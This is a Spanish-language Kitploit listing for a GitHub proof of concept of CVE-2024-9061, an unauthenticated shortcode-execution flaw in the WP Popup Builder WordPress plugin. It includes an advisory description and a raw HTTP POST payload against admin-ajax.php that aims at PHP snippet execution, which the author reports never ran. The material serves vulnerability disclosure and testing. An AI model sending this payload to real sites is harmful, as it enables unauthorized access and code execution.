Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-9061
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-9061

CVE-2024-9061

WP Popup Builder – Popup Forms y generación de leads de marketing <= 1.3.5 - Ejecución arbitraria de shortcode sin autenticación vía wp_ajax_nopriv_shortcode_Api_Add

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-9061

WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Ejecución arbitraria de shortcodes sin autenticación a través de wp_ajax_nopriv_shortcode_Api_Add

Descripción

El complemento de WordPress WP Popup Builder – Popup Forms and Marketing Lead Generation es vulnerable a la ejecución arbitraria de shortcodes a través de la acción AJAX wp_ajax_nopriv_shortcode_Api_Add en todas las versiones hasta la 1.3.5 inclusive. Esto se debe a que el software permite a los usuarios ejecutar una acción que no valida correctamente un valor antes de ejecutar do_shortcode. Esto hace posible que atacantes no autenticados ejecuten shortcodes arbitrarios. NOTA: Esta vulnerabilidad fue parcialmente corregida en la versión 1.3.5 con una comprobación de nonce, que efectivamente impidió el acceso a la función afectada. Sin embargo, la versión 1.3.6 incorpora la verificación de autorización correcta para prevenir el acceso no autorizado.

Tenía otro complemento instalado para la ejecución de PHP para esto, pero nunca logré que se ejecutara.

[xyz-ips snippet="test"]

Información

root@kitploit:~
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d

La respuesta es un 200 en blanco.

Descargar herramienta